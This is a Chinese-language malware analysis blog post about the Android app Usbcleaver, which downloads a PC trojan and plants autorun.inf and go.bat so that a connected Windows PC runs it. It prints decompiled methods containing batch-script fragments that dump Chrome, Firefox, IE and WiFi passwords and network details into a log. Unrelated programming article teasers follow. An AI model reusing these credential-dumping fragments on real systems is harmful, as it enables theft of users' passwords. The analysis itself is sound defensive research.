【Android病毒分析报告】 - Usbcleaver

本文章由Jack_Jia编写,转载请注明出处。
文章链接:
http://blog.csdn.net/jiazhijun/article/details/9179749

作者:Jack_Jia 邮箱:[email protected]


一、病毒样本基本信息

Md5:283d16309a5a35a13f8fa4c5e1ae01b1
Package:com.novaspirit.usbcleaver



二、病毒代码分析


1、查看AndroidMainfest.xml文件


由清单文件可以看出,该恶意软件的入口点只有一个.USBCleaverActivity。


2、代码分析流程

代码树结构如下:


经过对程序唯一入口点的分析,恶意代码工作流程如下:


1、点击程序图标后运行USBCleaverActivity组件,该组件主要负责病毒运行环境的创建,如病毒所需目录结构。通过payloadHander完成autorun.inf文件写入(当以USB设备连接PC时,PC根据该文件配置运行go.bat),通过downloader完成对PC木马的下载。




2、downloader类负责PC木马压缩包的下载,下载后通过decompress完成PC木马压缩包解压

下载的PC木马压缩包信息如下:



3、payload通过payloadHandler产生go.bat,go.bat文件在autorun.info中配置运行。


  public String dumpChromePassword()
  {
    this.dumpChromePassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +         [Dump Chrome PW]         + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\ChromePass.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpChromePassword;
  }

  public String dumpFFPassword()
  {
    this.dumpFFPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\nEcho +         [Dump Firefox PW]        + >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\n%progdir%\\PasswordFox.exe  /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpFFPassword;
  }

  public String dumpIEPassword()
  {
    this.dumpIEPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +           [Dump IE PW]           + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\iepv.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpIEPassword;
  }

  public String dumpSysInfo()
  {
    this.dumpSysInfo = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +          [System info]           + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nIPCONFIG /all >> %log% 2>&1\r\n\r\n";
    return this.dumpSysInfo;
  }

  public String dumpWifiPassword()
  {
    this.dumpWifiPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +          [Dump WIFI PW]          + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\WirelessKeyView.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
    return this.dumpWifiPassword;
  }

go.bat文件内容就是执行下载PC木马的执行。到此PC平台木马的运行环境搭建完毕。当手持设备以USB模式连接PC后,PC木马即可成功运行。


三、病毒运行模型及恶意行为

Usbcleaver病毒运行时从服务器下载PC木马压缩包,并解压到SD卡,创建autorun.info和go.bat文件搭建PC木马运行环境。当手持设备以USB设备模式连接电脑后,下载的PC木马能够立即执行。
下载的PC木马能够窃取以下隐私信息:
1、Default gateway
2、DNS
3、Google Chrome password
4、
Host name
5、IP address
6、Microsoft Internet Explorer password
7、Mozilla Firefox password
8、Physical address
9、Subnet mask
10、WiFi password
虽然该病毒目前感染量并不大,但是该病毒的运行模式及危害却应该引起安全人员的高度重视。通过移动设备感染PC设备这种方式以前也出现过(http://blog.csdn.net/jiazhijun/article/details/8649473)。这种跨设备的病毒感染方式相对以前病毒具有更加精准的目的性。
目前短信认证码已经大量运用于电子商务和网银类网站。即使用户通过PC木马窃取了您网站的用户名和密码。但是涉及交易时需要输入动态的短信认证码,PC木马试图侵入到您的手机从而获取短信认证码的难度是相当大的。交易通道和认证信息的“独立双通道”是网上交易安全大大增强。然后如果木马通过感染移动设备,今儿感染用户的PC设备。这样木马就完全控制了用户的交易通道和认证通道,整个交易流程完即刻被木马攻破。

五、相关链接


http://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99

http://news.ccidnet.com/art/1032/20130625/5029495_1.html

版权声明:本文为iteye_7514原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_7514/article/details/82516789

智能推荐

【机器学习基础】线性回归

                                                        &nbs...

08-Vue实现书籍购物车案例

书籍购物车案例 index.html main.js style.css 1.内容讲解 写一个table和thead,tbody中每一个tr都用来遍历data变量中的books列表。 结果如下: 在thead中加上购买数量和操作,并在对应的tbody中加入对应的按钮。结果如下: 为每个+和-按钮添加事件,将index作为参数传入,并判断当数量为1时,按钮-不可点击。 结果如下: 为每个移除按钮添加...

堆排序

堆排序就是利用堆进行排序的方法,基本思想是,将代排序列构造成一个大根堆,此时整个序列的最大值就是堆顶的根节点。将它与堆数组的末尾元素交换,此时末尾元素就是最大值,移除末尾元素,然后将剩余n-1个元素重新构造成一个大根堆,堆顶元素为次大元素,再次与末尾元素交换,再移除,如此反复进行,便得到一个有序序列。 (大根堆为每一个父节点都大于两个子节点的堆) 上面思想的实现还要解决两个问题: 1.如何由一个无...

基础知识(变量类型和计算)

一、值类型 常见的有:number、string、Boolean、undefined、Symbol 二、引用类型 常用的有:object、Array、null(指针指向为空)、function 两者的区别: 值类型暂用空间小,所以存放在栈中,赋值时互不干扰,所以b还是100 引用类型暂用空间大,所以存放在堆中,赋值的时候b是引用了和a一样的内存地址,所以a改变了b也跟着改变,b和a相等 如图: 值...

猜你喜欢

Codeforces 1342 C. Yet Another Counting Problem(找规律)

题意: [l,r][l,r][l,r] 范围内多少个数满足 (x%b)%a!=(x%a)%b(x \% b) \% a != (x \% a) \% b(x%b)%a!=(x%a)%b。 一般这种题没什么思路就打表找一下规律。 7 8 9 10 11 12 13 14 15 16 17 18 19 20 28 29 30 31 32 33 34 35 36 37 38 39 40 41 49 50...

[笔记]飞浆PaddlePaddle-百度架构师手把手带你零基础实践深度学习-21日学习打卡(Day 3)

[笔记]飞浆PaddlePaddle-百度架构师手把手带你零基础实践深度学习-21日学习打卡(Day 3) (Credit: https://gitee.com/paddlepaddle/Paddle/raw/develop/doc/imgs/logo.png) MNIST数据集 MNIST数据集可以认为是学习机器学习的“hello world”。最早出现在1998年LeC...

哈希数据结构和代码实现

主要结构体: 实现插入、删除、查找、扩容、冲突解决等接口,用于理解哈希这种数据结构 完整代码参见github: https://github.com/jinxiang1224/cpp/tree/master/DataStruct_Algorithm/hash...

解决Ubuntu中解压zip文件(提取到此处)中文乱码问题

在Ubuntu系统下,解压zip文件时,使用右键--提取到此处,得到的文件内部文件名中文出现乱码。 导致此问题出现的原因一般为未下载相应的字体。 解决方案: 在终端中使用unar命令。 需要注意的是系统需要包含unar命令,如果没有,采用如下的方式解决: 实例效果展示: 直接提取到此处: 使用 unar filename.zip得到的文件...

centos7安装mysql8.0.20单机版详细教程

mysql8.0之后与5.7存在着很大的差异,这些差异不仅仅表现在功能和性能上,还表现在基础操作和设置上。这给一些熟悉mysql5.7的小伙伴带来了很多困扰,下面我们就来详细介绍下8.0的安装和配置过程。 mysql在linux上的多种安装方式: 1.yum安装 由于centos默认的yum源中没有mysql,所以我们要使用yum安装mysql就必须自己指定mysql的yum源。在官网下载mysq...